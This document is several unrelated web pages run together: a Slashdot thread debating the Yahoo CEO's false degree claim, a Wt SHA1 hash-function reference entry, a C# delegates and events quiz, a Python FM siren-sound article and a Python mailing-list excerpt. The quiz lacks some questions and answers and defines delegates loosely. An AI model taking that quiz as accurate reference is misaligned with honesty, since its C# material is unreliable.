In all likelihood it was either taken straight from his bio on e-bay (which may or may not have come from him) or the 5th page of his resume that hadn't been updated in 20 years. It's not about him being CEO, it's about whether a degree even matters for a 50+ year old employee with a strong employment background. It doesn't. Yes, a junior programmer who explicitly lied about his degree should get fired, because that would be a critical part of the decision to hire him. But an older employee gets hired based on a solid work history and his degree may never come into question. In that case, CEO or not, the employee would probably not get fired just for having a lie 5 pages deep in his resume.. Re: (Score:2). I would think all information you provide is _all_ under the assumption of "this is true to my knowledge". What is the point of it if it's not true? Does that really have to be spelled out? Re:It's the hypocricy (Score:5, Insightful) Yes, a junior programmer who explicitly lied about his degree should get fired, because that would be a critical part of the decision to hire him. Same goes for the CEO. A critical part of the decision to hire him was that he made the best effort to give correct information to the Board of Directors. Even if it were truly irrelevant that the CEO had a technical degree (which I doubt), you still have the issue of lying to your employer which is routinely grounds for dismissal. But let's suppose your view of things is correct, that the CEO didn't lie to the Board, and that this person merely uses a fraudulent biography for their public face at the company. It's still a remarkable lack of professionalism and display of poor judgment. Re:It's the hypocricy (Score:4, Insightful) The issue I have with this is that he likely has had that degree listed on his resume for a very long time. From the very beginning, when he first placed it there, he was using that lie to help him get to where he is today. 
While he currently does not need the degree to do his job adequately (unlike, say, a degree in engineering), there probably was a time in one of his prior jobs where that degree was required or highly useful for him to be considered for a position. In other words, he used this lie to get to this point in his career. This is not a one-time thing. Re: (Score:2) Any other employee would be fired for lying on a resume. It's not about the fraudulent answer -- it's about the fact of the lie. It's about them being untrustworthy. It's about you having to question everything they say. It's about the deeper question of whether you can count on them at all. Only once did I encounter this situation in my career. Out of fear of a wrongful dismissal lawsuit, the lier was allowed to work the remainder of their contract and terminated at the end of their 3 month term. B Re: (Score:2) Make that added "#include <stdio.h>" before each and every IO function call, as in: int im_in_my_function_now() { ... #include <stdio.h> printf( "I've entered my function!\n" ); Re:It's the hypocricy (Score:5, Insightful) Honestly, I truly doubt his supposed CS degree from 1979 ever ONCE came up in the board's discussion to hire him. I bet it did, albeit in passing: "oh, look: he has a degree in CompSci. That'd give us a little cred with other tech companies." It's not about him being CEO, it's about whether a degree even matters for a 50+ year old employee with a strong employment background. It doesn't. Therefore, he shouldn't have included it as a reason why they should hire him. But on a practical level, I despise that I'm competing for jobs with liars. My resume is probably a lot shorter than his, but it's completely accurate. I did the things I listed. I earned the degree I put on there. I'd hate to think that my resume - my summary description of why a company would want to hire me - is competing with another guy's which is sprinkled with lies that make him look like a better candidate. 
I guess I see it the same way as professional athlete who doesn't want to compete with steroid-fueled monstrosities. I want to get ahead by my own merits, but how am I supposed to go up against people who don't play by the rules? Given the choice between outing them to level the playing field or having to stoop to their level, I'd much rather start enforcing those rules. So fire him. He lied to get to where he is. Maybe that particular lie wasn't the make-or-break that got him the job over someone else who wanted it, but it was important enough to him that he included it. Re: (Score:3, Interesting). Some business law history. Prior to about 200 College should not be used as part of hiring (Score:2) College should not be used as part of hiring. Even more so in the tech field. So what some who is doing a IT job lied about College?? (may to just get past HR) who cares if they can do the job? You know not all people are not college material but they can take tech classes / go to tech schools. So what if they when as a non-matriculated student or took classes non degree? That is why at least for TECH there needs to be some kind of badges system. Re: (Score:3) This is a nice idea, but it flies directly into the extremely strongly held cultural / sociological belief that there is no difference between education and training and they're just synonyms for the same thing. You'd have better luck convincing people God does not exist thru logical argument. "College is training for a good job" is as closely held a belief as "god exists" In some ways, more closely held. We have badges, they're called certifications, and decades of handing them out like crackerjack prize Re: (Score:2) Re: (Score:2) Most companies I know of will not fire employees for resume lies. They will seek to fire employees for other reasons, and discover resume lies as one ironclad reason to do so. But a competent employee whose resume lie came to light for another reason? 
They'd get a formal admonishment in their record for doing so, which would create a window of about a year where a justified dismissal could be done if needed, but assuming they continued to be competent? Hardly anyone would let them go. Re:It's the hypocricy (Score:4, Insightful) So what makes the fudging of a 30-year old accomplishment on the Yahoo CEO's resume a transgression...? 2 wrongs don't make a right? The continuing saga of US CEOs ripping off the public? The fact that a senior executive might be good, but that doesn't excuse immorality and in fact makes it much more likely that they'll screw 'consumers/customers/stakeholders' along the way. There's many reasons, they should all be called on it unless you like more ENRON style failures. Re:It's the hypocricy (Score:5, Interesting) I may be an old fashioned relic but my word is my bond. It is important from a practical level I cannot do business with you if you are lying unless I mean to simply screw you over. I have no way of negotating with you in good faith. if I want repeat busness I cannot pursue a strategy of wringing ever last drop from a deal simply achieve what I need at a profitable arrangement for both parties. If you lie to me I cannot do this. Re: (Score:2) Except he didn't lie to you. This has nothing to do with YOU. Re:It's the hypocricy (Score:4, Insightful) I am trying to understand the concept of why you would wait for a know liar to lie to you before no longer trusting them. This whole corporate public relations yarn that it is acceptable to lie as long as it makes money, regardless of the other consequences of the lie ie, other people lose money, other people get sick, other people die, face is just crap. People have an expectation of not being lied to by every single person they meet and, in fact of not being lied to as standard business practice by modern corporations even though, that is exactly was is happen all PR=B$ upped by mass media as somehow being acceptable. 
Enough is enough, corporations and their executives get caught out and they will be mocked, ridiculed and derided , it will be harsh and, extended because hint, hint everyone is sick of it being standard 'modus operandi' for corporations. Re: (Score:3) Where did he say he believed that other people are always telling the truth? He said he can't maintain long term business relations with people who have a history of lying to him. That said; in my experience nothing lasts forever. You have to KEEP THEM HONEST by never trusting anybody. Investors should care (Score:3) It depends on WHEN he lied. Really? If he thinks it is acceptable to lie to make himself look better then on his CV then, were I a Yahoo! stock holder, I would be concerned that he might also think it acceptable to lie to make the company's bottom line (and by extension himself) look better. In many ways the ethical behaviour of the CEO is far more important than those in the rest of the company - if the sandwich guy decides to behave unethically you risk losing a few $100 of sandwiches. If the CEO behaves unethically you can lose ev Re:It's the hypocricy (Score:5, Insightful) The standard here is that everybody is expected to respect common decency and have a reasonable level of personal integrity, regardless of CEO or the common worker. Claiming a degree violates both to the extreme. Degrees are things people trust. Claiming one without having one it a violation of the order of society. It also reflects massively and negatively on the character of the person doing it. Hence lying about a degree disqualifies you as a member of decent society, must get you ass fired and your career to be over. Or you can go the way of, for example, Northern Korea, where a nil-whit is called the "Genius of the Geniuses". Of course, _that_ guy is a figurehead. Re:It's the hypocricy (Score:5, Insightful) More like by lying he's secured himself an opportunity that never would have been given him otherwise. 
It's a messed up society when you can get further by lying and cheating than you can by playing it straight. Re: (Score:2) It's a messed up society when you can get further by lying and cheating than you can by playing it straight. I understand where you're coming from, but the above is a truism. You could reasonably define cheating as "lying to get ahead unfairly", so by definition, cheating would always get you further ahead than would playing it straight. Re: (Score:3) Hence lying about a degree disqualifies you as a member of decent society, must get you ass fired and your career to be over. Being a decent member of society is not a prerequisite to being a CEO. Re: (Score:2) Heck, it probably disqualifies you. Wasn't there a study that confirmed that? (Score:3) Re: (Score:2) to become a regular "M.D." requires a lot more than telling someone in H.R. that you have a degree. Re: (Score:2) It wouldn't matter, because he can claim to have all the medical degrees he wants, but if he doesn't have a verifiable medical license, he can't do squat anyway. Re: (Score:3) There are specific legal consequences to practicing medicine without a license, and the employer would be liable. That is not true in most fields. Re:It's the hypocricy (Score:5, Insightful) "Yes, the CEO is far more important to the company than the sandwich guy." Therefore is far more important to get the facts right *prior* to hire somebody for that role, isn't it? Well, by lying about his CV in order to get his position, his lie is far more important than the sandwich guy doing the same, isn't it? Now, what was your point, again? Re: (Score:3) Yes, the CEO is far more important to the company You can reasonably argue thats not true. The only constant of corporate life is groupthink concentrates at the top. A standard issue stuffed suit is identical to any other standard issue stuffed suit. Any variation in results by different stuffed suits is caused by natural market variation. 
Who the board selects is not really all that important. Very much like programmer output, the top 0.1% of rock star workers (programmer or CEO) will outperform the masses by a factor of 10, but there are not enough 0. Re: (Score:2) There's a big difference between a Steve Jobs and a Carly Fiorina though. Re: (Score:3) Donno. The HP killer was the impedance mismatch between ultra high volume commodity computer sales for a profit of $10K/shipping container, medium volume selling small quantities of inkjet ink for $10K/gallon, and ultra low volume selling exotic EE test equipment for roughly $10K/kilo. If you found three independent companies and pitched for VC or junk bonds to finance a merger, they'd put you in a straitjacket. No matter who was in charge, HP was going to have to explode and crash, and the people who t Re: (Score:2) He is paid way too much for anyone to tolerate the merest failing. Your salary reflects your abilities, importance and responsibilities. High salary means that I have a very high expectation of your morals. The CEO picked his salary, so he deals with the backslash when it turns out he is a lying scumbag. Re: (Score:2) High salary means that I have a very high expectation of your morals. That's funny, with me it's the other way around. Re: (Score:2) To build on your point, the companies referenced as contrasts here (Apple, Google, Facebook) are all hugely successful. Whereas Yahoo, under the current CEO, isn't. In the real world, being successful gets you a lot of latitude. There's less tolerance for things like dishonesty if you don't at least get results (for those who would judge you) while lying. Re: (Score:2) "Why would you fire an employee who lied on their CV, yet does the job well?" To send a message. Provided the employee does in fact the job well, it can't be because of the statements in his resume that led to hiring him so, from the part of the contractor it was blind luck. 
If you are going to hire under a "blind luck" assumption, you surely should better fire all your hiring personnel and just hire on, say, a first come first gets it basis (hmmm... for so many companies I think it wouldn't be such a big

Re:1979 was pre-PC era (Score:5, Insightful)

This is an astonishingly ignorant thing to write. What part of CS is different now than from 1979? Has O(n) suddenly become equal to O(log n)? Regardless, recent trends have been bringing computing back to the mainframe model. Computation started out concentrated on mainframes because computers were so expensive. Microcomputers pushed computation out to the edges. Cloud and web services are swinging the pendulum back to a centralized model, but guess what? CS has been relevant and valid through that entire spectrum. Whether or not CS is important to the CEO of Yahoo! is arguable. I think most people are concerned about Thompson's values, not his knowledge of balancing trees.

Re:1979 was pre-PC era (Score:5, Insightful)

"This is an astonishingly ignorant thing to write."

If you hadn't noticed, Slashdot is dominated by IT types who may be excellent sysadmins or even good software engineers, but have very little idea what computer science is.

Re: (Score:2)

The funny thing is nothing is ever new in IT... It's all the same old stuff with new marketing, as the natural cycle turns. There is a huge competitive on-the-job advantage in having experienced the previous cycle(s), which noob IT people are completely blind to. Also it's impossible to be a good software engineer or good sysadmin without knowing CS. Almost an oxymoron. Maybe they don't know enough math to follow Knuth, but a good one has at least a gut level instinctual level of low level CS knowledge. It

Re: (Score:3)

There's a slight difference between IT in 1979 and IT in 2012. Good software engineers know CS like good civil engineers know physics.
A good civil engineer has to have an excellent knowledge of things like Newtonian mechanics, but doesn't really need to know much or anything about relativity, quantum mechanics, or most of the rest of physics. And he really doesn't need to know how to produce new knowledge of physics.

Re: (Score:3)

Slashdot is [NOW] dominated by IT types who may be excellent sysadmins or even good software engineers, but have very little idea what computer science is.

FTFY. It wasn't always this way. Something bad happened after that number was made illegal. btw, mod up! Computer science is mathematics and only mathematics; CS is not coding, not SQL querying, not sysadmining... and a computer scientist installing software for a living is akin to a medical doctor working as a licensed practical nurse. Think of the poor LPN that must compete against M.D.s for their jobs! Think of the lowly auto mechanic that must compete against mechanical engineers just to find gainful occup

Re: (Score:2)

Meaning what, exactly? My employer is implementing tablets... as front-end devices for mainframe-based computing. The tablet in this computing model is fundamentally no different from an X Terminal: a device with limited compute power and storage, acting as the physical user interface to a centralized system where all the data processing takes place. And this isn't just in "enterprise"

Re:1979 was pre-PC era (Score:5, Informative)

Thank you for this demonstration of how age discrimination works in the tech industry. For the record, PCs existed before 1984, and as long as you don't insist on IBM-standard they also existed in 1979 (e.g. Commodore PET, TRS-80, Apple II). And there were CS degrees even before those existed. I have a CS degree from the 1980s (transcripts available), and as a matter of fact I did learn to write Fortran on a DEC minicomputer (a Vax 11; the PDP was in high school).
Very little of my CS coursework was done on microcomputers: just graphics, assembly language, and an independent study. I had my own micro in my dorm room, which I used to dial into the Vax, for word processing, and to play Missile Command. No Internet, just a BITNET e-mail gateway. In fact, very few of the technology standards in use then are still in use now; even ASCII is on the way out. But what I learned back in the Dark Ages (before the Windows opened up) wasn't simply Fortran, command-line interfaces, and the use of parity bits over a serial connection. What I learned was how to solve problems, and those skills remain just as relevant and valuable today as they were a quarter century ago.

Re:1979 was pre-PC era (Score:4, Informative)

For the record, PCs existed before 1984

Not only did computers exist, but I'd say the biggest, most fundamental developments of computer science happened in the 1970s. In that decade, the greats like Lamport, Dijkstra, and Knuth were making the discoveries that underlie all modern systems. To name a few, linear programming, multithreading, distributed systems and processes, routing, and NP-completeness all got developed during the 70s. Would have been an awesome decade to be a computer scientist.

Re: (Score:3)

You forgot to mention your mad Multiplan skillz0rs.

Re: (Score:3)

Maybe the fact that there are people who lie on their CV and still do a good job means that the actual importance of a CV is hellishly overblown.

Re: (Score:3)

Liars make good CEOs.

Re: (Score:2)

At least some of the people who were designing machines in 1984 will have had a 1979 CS degree, and if they're still designing machines today I'd hazard that they're quite good at it by now.

Re:It's the hypocrisy (Score:5, Insightful)

Acceptance my ass. Getting away with things that one of lower social status would get the book thrown at him for is simply one of the perks of being part of the elite.
We don't embrace it, we just grudgingly tolerate it because we have no choice.

Re: (Score:3)

I guess lying and blatant abuse works.

That's right, it does. And it will continue to work until the alphabet soup government agencies who supposedly provide oversight start handing out penalties that are larger than the gains to be had. It's not a punishment if it's cheaper than doing things the right way, it's a discount.

Re: (Score:3)

Missing mod option: -1 blatant lies

Missing mod option: -1 astro-turfing.

Unethical Culture, Bah (Score:5, Insightful)

Re:Unethical Culture, Bah (Score:4, Interesting)

The only reasonable thing was said at the end... by all means off with his head, it's a fucking good start. That's why the 0.1% is using the media to defend the indefensible; it sets a dangerous precedent... being held accountable even the smallest bit must never even be on the table for them.

I guess this means... (Score:5, Insightful)

They've just moved to the top of my list of potential employers! Did I mention that I created the Internet, the World Wide Web, and all the programming languages they use?

Re: (Score:3)

I'm sorry, but lying on your resume and getting away with it is a privilege reserved for the elite.

Re: (Score:2)

I guess this means that it's fine to lie to Yahoo when applying for a job.

Yahoo is a dying shell of a company with nothing innovative or interesting to work on. So in a way you have to lie - unless you put down "nobody else will hire me" as your reason for applying.

Re: (Score:3)

Do you want a leader who lies? (Score:5, Insightful)

When it comes to the people who are leading a division or organization, this becomes even more important. What kind of shady deals would these people be willing to make, what kind of precarious situations would they be willing to put the company in?
If you lie to get into the company on the bottom rung, it becomes more and more difficult to correct those lies as you progress in your career and climb the corporate ladder. If you choose to go that route, you'd better switch companies once you've acquired some experience and start your new job without lies.

Re: (Score:2)

Don't politicians lie all the time? A political promise only commits those who receive it...

Re: (Score:2)

A boss whose company is being acquired is often given a bribe ("retention bonus") to lie to his employees about what he knows and what is going to happen for a long per

Re: (Score:3)

While the line isn't always clear, in general it's NOT OK to lie on a resume to obtain a job or gain advancement

I cry bogus. When the economy results in 100 fully qualified applicants for each job, the only way to rise to the top of the resume pile is to lie. Therefore most hired by resume and resume filtration are liars, or at least the percentage of liars is spectacularly high, or honest people are dramatically underemployed. I've gotten all my jobs since 1995 thru "knowing people" and "having heard about me" so I haven't had to lie; I've got no dog in the fight so I can be honest about the situation. A good resu

Re: (Score:3)

Now, I trust references from trusted sources first, things I learn from an interview second, and never trust a resume. It's a huge pain in the ass

Re: (Score:2)

Proof of a degree? What company do you work for? I have never applied for a job that required proof of my degree.

Engineers depend on truth (Score:4, Informative)

Yes, we can be a bit literal minded. But we depend on knowing the straight dope to do our jobs; our core competencies are founded on the ability to employ facts that we know to be, well, factual. Hence it's not really a surprise to find that we don't like people lying. It unsettles us.
It's like some ghastly evil magic, the ability to blithely say things that aren't true without suffering any kind of stress reaction at all. Even that thing that management do where they misunderstand what you are saying about the capabilities of a technology and misrepresent it in a meeting brings us out in hives. Discovering that they are doing it on purpose really offends us.

Re:Engineers depend on truth (Score:5, Insightful)

It also offends us greatly when somebody is claiming to be an engineer that really is not. It demeans us and means our skills are arbitrary and that anybody can claim them without verification and consequences. This cannot be allowed to stand.

Re: (Score:2)

It also offends us greatly when somebody is claiming to be an engineer that really is not. It demeans us and means our skills are arbitrary and that anybody can claim them without verification and consequences.

Isn't it actually illegal in the US to claim to be an engineer and practice engineering without a degree or certification?

Hmmm (Score:3)

So it's acceptable for people to lie if they are important? I suppose paying a small fine for doing unethical actions purifies the actions somehow. Society seems to accept this, and society is always correct, so those that don't agree are big dodo heads and totally unreasonable.

Lying's okay... as long as you're punished for it (Score:5, Interesting)

Paraphrasing the article:

"Google lied ... and paid $500M when they got caught"
"Facebook lied ... and settled with the FTC when they got caught"
"Scott Thompson lied ... so just leave him alone, people!"

Re: (Score:2)

The difference though is in the target of the lie.

- Good: When you lie to the SEC or another company, that's just being a good businessman and valued member of your own corporation.
- Bad: However, lying to your boss and your shareholders means you're not to be trusted with the position you hold.
Re: (Score:3)

You do all understand, I hope, that Lyons is himself hardly the picture of virtue. This is a guy who gave SCO a free ride for years, and even when he was finally forced to admit he'd been wrong, still managed to blame Linux supporters for the whole thing.

did he look like this when he said that? (Score:2)

Leave $name alone! (Score:2)

I assume that's the "Leave Britney Alone" guy... I was amused by the pun in the /. article title...

Lying about accomplishments disqualifies him (Score:5, Insightful)

There are a few things that are completely unacceptable to lie about, and that disqualify you as a member of civilized society. Education is the most important. All those that now protect Thompson do not seem to get it. My guess would be quite often due to a lack of education, and in some cases certainly because they have done the same. If lying about degrees suddenly becomes acceptable, everybody will do it and degrees become meaningless. As degrees provide not only the degree itself, but specific skills, knowledge and insights, if degrees become meaningless, incompetence in critical positions will rise.

The second thing is that lying about a degree speaks volumes about the personality and character of the person doing it. It speaks of somebody that claims to be something he is not. It speaks of ambition without skill. It makes it highly likely he lied and continues to lie in other regards and that he is a generally dishonest person, at least whenever he thinks he can get away with it.

As to the matter in detail, yes, even an old CS degree matters very much. It gives a different perspective on a number of things that have not changed at all. Details may have changed, but the fundamental issues are still the same, and this person does not have the skills to assess them. You cannot go from nothing to master just watching these things from the outside. You have to have hands-on experience, and a CS degree provides that.
For these reasons, Thompson must step down and his career must be over. Otherwise we will get even more dishonest and incompetent (but power-hungry) people in comparable positions.

Re: (Score:3)

Otherwise we will get even more dishonest and incompetent (but power-hungry) people in comparable positions.

Too late. The psychopaths have been driving the bus for most of the latter 20th century. The 21st-century version is all about 'coming out' and eliminating the legal obstacles for corporate gluttony and fascism, it seems.

Re: (Score:2)

Even a college degree is a real accomplishment, and anybody claiming one without having one is scum. I do not have one, but a few other degrees. That would not make me trample over people's college degrees though. As to the ad hominem argument: it is the mark of a small mind. Goes well with being an Anonymous Coward.

Summary hole (Score:5, Informative)

The summary missed perhaps the most interesting part of the article:

The point being that everyone is dishonest, and while this guy got caught in a particularly clear-cut case of dishonesty, it's not very important, and it's not at all as bad as what the guy who accused him is doing. I agree with him there. The only thing I wonder about is the intelligence of a guy who felt the need to lie about his degree when it matters so little given his work experience, and when it can easily be checked. Sadly, I question the competence of a CEO who can't lie well. Maybe that's what the board is really investigating.

Re:Summary hole (Score:5, Insightful)

A little reality check I occasionally give to students: Outside of academia, the only people who will ever sincerely care what your major was in college (and especially your minor) are the people who hire you for your first job. At that point in your career, your major and the grades you got in those classes are all you have going for you, so it's the only basis they have for judging you.
But when you apply for your second job, all they will care about is your performance at your current/previous job, and maybe what kind of grades you got in college. "You've got a BA in English Literature, but you've spent the last two years writing binary control code for moisture vaporators? Welcome to Hutt Engineering." Third job and onward: it's 100% about your work experience. So it isn't worth lying about, and it isn't worth the petty outrage over it.

Re: (Score:2)

and western culture seems to revel in tearing down anyone successful for the most petty things

nah, this is just an affectation from people on the left. Rednecks compare the size of their gun collections, holier-than-thou leftists compare the size of their outrage at minor social transgressions, as in:
- What, you used the word "seminal"? aren't you aware of its 5th century B.C. possibly sexist origins?? Shame on you!
- Oh yeah? Well I think he should resign.
- Well, I think he should resign _and_ all his writin

Re: (Score:2)

The only thing I wonder about is the intelligence of a guy who felt the need to lie about his degree when it matters so little given his work experience and which can easily be checked.

That's the problem with lies - you get caught in them. It would certainly have mattered a lot when he was first in the industry. After that, when do you suddenly drop it? Once he was well-known, that background would have become attached to him, and it would have been impossible to drop quietly without something public.

Re: (Score:2)

Not everyone is dishonest. Far from it. I know very few people who lie other than the ever popular white-lie answers to loaded questions like "does this outfit make me look fat?" I agree that the fellow making the issue over the lie on the resume has a motivation for doing so. It's good to know that his motivation is control of the company rather than vengeful destruction of someone's career just for the sake of making their lives miserable.
Yahoo has been struggling. Everyone knows that. It seems p

Re: (Score:2)

Digging up dirt on a guy you want to see gone and then publicly posting it on the internet while posing as the good guy who's just fighting for the truth (as opposed to a shareholder with a personal stake in things) is worse in my book than lying about your college major after graduating decades ago and leading another tech company in the meantime. I'd like to say I don't necessarily believe TFA's version of events, at least not without a second source corroborating it and Loeb getting a chance to have his s

Re: (Score:2)

Why does he need to disclose he is a shareholder when publicizing a lie the CEO told about his resume? Either the CEO does or does not have the CS degree. If a major shareholder wants him gone that much, it seems like a good idea that he should be gone.

Same standards for everyone is what's at stake (Score:2)

What's at stake here isn't whether his lack of a degree matters or whether this is one of those innocent embellishments. We shouldn't let ourselves be lulled into a debate over what we think the real issues are -- the same standards and punishments should be applied to this CEO as would be applied to any other employee in the organization. There shouldn't be a double standard for this guy just because he's the CEO.

Bill Clinton Lied (Score:2)

and only the Republicans seemed to care about that one..

no pass for Thompson or Jobs (Score:3)

Leave Scott Thompson alone? No! And Steve Jobs is not the greatest CEO ever. What a sorry, pathetic apologist Mr. Lyons is being! Does he like Lloyd Blankfein, Tony Hayward, Angelo Mozilo, Dick Fuld, Brian Moynihan, Ken Lewis, and Ken Lay too? Stop being bedazzled by wealth and power, and not caring whether it was ill-gotten! Too many people still venerate them, even now, when memories of the most recent disaster perpetrated by our wealthy elite should still be fresh. It's dangerous.
Are honest people all idiots, chumps, dupes, and mushrooms? What kind of world does Lyons want for us all?

We think that little of CEOs? (Score:2)

So if I read this correctly, we're now at the point where our collective opinion of CEOs is so low that any standard of behavior above "didn't go on a shooting spree" is considered acceptable? Sorry, but no. We should expect at least out of our so-called "leaders" what we expect out of entry-level staff or unpaid interns. That many CEOs are too morally bankrupt to meet that standard doesn't mean we lower it.

Dear mr. Lyons, (Score:2)

Dear mr. Lyons, just because they all lie, doesn't make it okay for any single one of them to lie.

Lousy kids (Score:2)

"But mooooooooooooooooooommmmmmmmm! They did it fiiiiirssssst!"

Re: (Score:2)

The "He started it" line is often an attempt to whine about others getting away with something you get stuck being punished for.

A quick look at the ethical fallacy scoreboard... (Score:3)

Really, if you have to use fallacies to support your position, is your position actually really a sustainable one?

Re: (Score:2)

Re: (Score:3)

"Slight exaggeration" is already dishonest and means you are lying scum. Claiming a multi-year degree is not "slightly exaggerating" though. I do not know about the US, but in Europe, this is criminal and can get you fined. There are some multiple offenders (on PhD-level though) that have been sent to prison. In any case, this is grounds for immediate termination.

Re: (Score:2)

Let those whose resumés are a frankly honest documentation of their job histories, and those who have not put any "spin" on the reasons for leaving previous jobs... throw the first stones.

Re: (Score:2)

Okay. Are you volunteering as the first target?

Re: (Score:2)

I don't have to, darling.

Re: (Score:2)

I don't have to exaggerate my achievements and responsibilities. But I have claimed 'diplomacy' among my skills. Which is true in a sense.
I no longer tell Chinese PhDs their projects would get failing grades in undergraduate data structures courses (especially when it's true).

A resume is a marketing document. Positive spin is expected. Lying, no. Slight exaggeration?

Re: (Score:2)

Re: (Score:2)

This kerfuffle is about someone wanting to be on the board, and that person manipulating hatred of dishonesty to try and get what he wants
http://tech.slashdot.org/story/12/05/06/024254/leave-yahoo-ceo-scott-thompson-alone
A cryptographic hash function implemented using SHA1.

#include <Wt/Auth/HashFunction.h>

This hash function is only available if Wt was compiled with OpenSSL support. It is useful for creating token hashes, but should not be used for password hashes.

compute(): Computes the hash of a message + salt. The message is usually an ASCII or UTF-8 string. The salt and the computed hash are encoded in printable characters. This is usually ASCII-encoded (as for the UNIX crypt() functions) or could be Base64-encoded. Implements Wt::Auth::HashFunction.

name(): Returns the name for this hash function. Returns "SHA1". Implements Wt::Auth::HashFunction.
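The compute() contract described above (hash of message + salt, with the result encoded in printable characters) can be sketched outside of Wt. The following is a conceptual illustration in Python using hashlib and Base64, not the Wt C++ API itself; in particular, the exact way Wt combines the message and the salt is an assumption here.

```python
import base64
import hashlib

def compute(message: str, salt: str) -> str:
    # Hash the UTF-8 message concatenated with the salt (assumed order),
    # then encode the raw 20-byte SHA1 digest in printable Base64 characters.
    digest = hashlib.sha1((message + salt).encode("utf-8")).digest()
    return base64.b64encode(digest).decode("ascii")

print(compute("token-1234", "NaCl"))
```

The same message with a different salt produces a different printable hash, which is exactly why such a function is suitable for token hashes.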
http://www.webtoolkit.eu/wt/doc/reference/html/classWt_1_1Auth_1_1SHA1HashFunction.html
1.) What do you mean by a call-back method?
A delegate in C# is a class-type object that is used to encapsulate a method call and invoke a method at the time of its creation.

3.) What are the main purposes of using delegate objects?
- Callback
- Event handling

4.) Which class is used for delegate declaration?
System.Delegate

5.) What is a delegate in C#?
Delegate means "a person acting for another person" or "a method acting for another method".

6.) What are the steps involved in creating a delegate?
- Delegate declaration
- Delegate method definition
- Delegate object declaration
- Delegate invocation (calling)

7.) Through a delegate, only a function whose signature and return type match the delegate can be called? True

8.) What is the syntax for declaring a delegate?
<access-specifier> <delegate keyword> <return type> <delegate-name> <parameter-list>
Ex. public delegate void del();

9.) Which modifiers (access specifiers) control the accessibility of a delegate?
- public
- protected
- internal
- private
- new
Note: The new modifier is only used on delegates declared within another type.

10.) Where can we define delegates?
- Inside a class
- Outside the class
- As a top-level object in a namespace

Sealed.

12.) What is a delegate method and how is it declared?
A method whose reference is encapsulated into a delegate instance is known as a delegate method; in other words, a method which will be called by the delegate.
Ex.
public class student
{
    public void show()
    {
        MessageBox.Show("Hello Friends");
    }
}

13.) What is the delegate object declaration in C#?
We have already seen that a delegate is a class type and behaves like a class.
Syntax: delegate-name delegate-object = new delegate-name(expression)
Ex.
student obj = new student();
del delobj = new del(obj.show);

14.) What is delegate invocation in C#?
Syntax: delegate-object();
Ex. delobj();

15.) What are the types of delegates in C#?
There are two types of delegate in C#:
- Single-cast delegate
- Multicast delegate

16.) What is a single-cast delegate?
A delegate object that can call only one method is known as a single-cast delegate.

17.) What is a multicast delegate in C#?
A delegate object that can call more than one method in sequence is known as a multicast delegate.

18.) What is an anonymous method in the context of delegates?
A method body passed directly to a delegate, without a name, is known as an anonymous method.

19.) What is an event in C#?
An event is a kind of notification (information) given by one object to another object to perform a task.

20.) What is the syntax of event declaration?
<access-specifier> <event keyword> <delegate-name> <event-name>
Ex. public event del myevent;

21.) What is an event handler in C#?
An event handler is a method which is used for handling events.

22.) Are events fully based on delegates?
Yes. We cannot handle events without delegates.
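Since several of the questions above turn on single-cast vs. multicast invocation, here is a hedged sketch of the same idea in Python (functions are first-class there, so a plain list of callables stands in for a multicast delegate's invocation list; the function names are illustrative, not from the original post):

```python
calls = []

def log(msg):
    # Stands in for one delegate method.
    calls.append("log: " + msg)

def alert(msg):
    # Stands in for a second delegate method.
    calls.append("alert: " + msg)

# Single-cast: one reference, one method invoked
# (roughly: del d = new del(log); d("event fired"); in C#).
handler = log
handler("event fired")

# Multicast: several methods invoked in sequence
# (roughly: d = log; d += alert; d("second event"); in C#).
multicast = [log, alert]
for cb in multicast:
    cb("second event")

print(calls)
```

The ordering guarantee is the point: every callable in the list runs, in the order it was added, which mirrors how a C# multicast delegate walks its invocation list.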
https://www.msdotnet.co.in/2013/09/delegates-and-events-questions-and.html
Police Sirens and Frequency Modulation

Ah, the allure of the police siren call! Have you ever wondered how they sing their magical song?

Yesterday, I was looking into calculating fluctuation strength and playing around with some examples. Along the way, I discovered how to create files that sound like police sirens. These are sounds with high fluctuation strength.

The Python code below starts with a carrier wave at fc = 1500 Hz. Not surprisingly, this frequency is near where hearing is most sensitive. Then this signal is modulated with a signal with frequency fm. This frequency determines the frequency of the fluctuations.

The slower example produced by the code below sounds like a police siren. The faster example makes me think more of an ambulance or fire truck. Next time I hear an emergency vehicle, I'll pay more attention.

If you use a larger value of the modulation index β and a smaller value of the modulation frequency fm, you can make a sound like someone tuning a radio, which is no coincidence.

Here are the output audio files in .wav format: slow.wav, fast.wav

from scipy.io.wavfile import write
from numpy import arange, int16, pi, sin

def f(t, f_c, f_m, beta):
    # t = time
    # f_c = carrier frequency
    # f_m = modulation frequency
    # beta = modulation index
    return sin(2*pi*f_c*t - beta*sin(2*f_m*pi*t))

def to_integer(signal):
    # Take samples in [-1, 1] and scale to 16-bit integers,
    # values between -2^15 and 2^15 - 1.
    return int16(signal*(2**15 - 1))

N = 48000  # samples per second
x = arange(3*N)  # three seconds of audio

data = f(x/N, 1500, 2, 100)
write("slow.wav", N, to_integer(data))

data = f(x/N, 1500, 8, 100)
write("fast.wav", N, to_integer(data))

Published at DZone with permission of John Cook. See the original article here. Opinions expressed by DZone contributors are their own.
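As a quick check on what the parameters do: differentiating the phase 2π·f_c·t − β·sin(2π·f_m·t) and dividing by 2π gives an instantaneous frequency of f_c − β·f_m·cos(2π·f_m·t), so the peak frequency deviation is β·f_m. A short sketch (the helper function name is mine, not from the original post):

```python
from numpy import arange, pi, cos

def instantaneous_frequency(t, f_c, f_m, beta):
    # Derivative of the phase 2*pi*f_c*t - beta*sin(2*pi*f_m*t),
    # divided by 2*pi to convert back to Hz.
    return f_c - beta * f_m * cos(2 * pi * f_m * t)

# slow.wav parameters: carrier 1500 Hz, f_m = 2 Hz, beta = 100
t = arange(0, 1, 1/48000)
f = instantaneous_frequency(t, 1500, 2, 100)
print(f.min(), f.max())  # the siren sweeps 1300 Hz .. 1700 Hz
```

So the "slow" siren sweeps ±200 Hz around the 1500 Hz carrier twice per second, while the "fast" one makes the same sweep eight times per second.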
https://dzone.com/articles/police-sirens-and-frequency-modulation
On Oct 21, 3:47 pm, Carl Banks <pavlovevide... at gmail.com> wrote:
> On Oct 21, 11:09 am, Brendan <brendandetra... at yahoo.com> wrote:
> > Two modules:
> > x.py:
> > class x(object):
> >     pass
> >
> > y.py:
> > from x import x
> > class y(x):
> >     pass
> >
> > Now from the python command line:
> > >>> import y
> > >>> dir(y)
> > ['__builtins__', '__doc__', '__file__', '__name__', '__package__',
> > 'x', 'y']
> >
> > I do not understand why class 'x' shows up here.
>
> Because you imported it into the namespace, which is what the import
